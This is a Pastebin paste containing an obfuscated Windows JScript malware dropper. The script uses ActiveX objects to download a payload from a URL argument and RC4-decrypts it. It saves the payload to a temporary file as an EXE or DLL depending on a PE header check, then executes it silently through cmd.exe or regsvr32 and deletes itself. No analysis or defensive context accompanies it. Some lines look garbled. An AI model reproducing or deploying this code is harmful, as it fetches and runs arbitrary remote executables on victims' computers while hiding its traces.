Advertisement
Guest User

Untitled

a guest
Jun 30th, 2016
101
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. l=function(n,g){
  2.     for(var c=0,s=String,d,b=[],i=[],r=255,a=0;256>a;a++)
  3.         b[a]=a;
  4.     for(a=0;256>a;a++)
  5.         c=c+b[a]+g[v](ag.length)&r,d=b[a],b[a]=b[c],b[c]=d;
  6.     for(var e=c=a=0,p="push";e<n.length;e++)
  7.         a=a+1&r,c=c+b[a]&r,d=b[a],b[a]=b[c],b[c]=d,i[p](s.fromCharCode(n[v](e)^b[b[a]+b[c]&r]));
  8.     return i[u(15)](u(11))
  9. };
  10.  
  11. I="WinHTTPZRequest.5.1ZGETZScripting.FileSystemObjectZWScript.ShellZADODB.StreamZeroZ.ex",u=function(i){return I["split"]("Z")[i]},f=ActiveXObject;
  12.  
  13. try{
  14.     I+="eZGetTempNameZcharCodeAtZiso-8859-1ZZindexOfZ.dllZScriptFullNameZjoinZrunZ /c Z /s ";
  15.    
  16.     function o(b){
  17.         return new f(b)
  18.     };
  19.    
  20.     function g1(g){
  21.         var t=o("WinHTTP"+"."+"WinHTTP"+"Request.5.1");
  22.         t.setProxy(n);
  23.         t.open("GET",g(1),n);
  24.         t.Option(0)=g(2);
  25.         t.send();
  26.         if(0310==t.status)
  27.             return l(t["responseText"],g(n))
  28.     };
  29.     var q=o("Scripting.FileSystemObject"),m=WScript.Arguments,j=o("WScript.Shell"),s=o("ADODB.Stream"),p=".exe",n=0,L=WScript["ScriptFullName"],v="charCodeAt";
  30.     s.Type=2;
  31.     c=q["GetTempName"]();
  32.     s.Charset="iso-8859-1";
  33.     s.Open();
  34.     i=g1(m);d=i[v](i["indexOf"]("PE\x00\x00")+23);
  35.     s["WriteText"](i);
  36.     if(037<d){
  37.         var z=1;
  38.         c+=".dll"
  39.     }else c+=".exe";
  40.    
  41.     s["savetofile"](c,2);
  42.     s.Close();
  43.     z&&(c="regsvr32.exe /s "+c);
  44.     j["run"]("cmd.exe /c "+c,0)
  45. }catch(y1){}
  46.  
  47. q["Deletefile"](L);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement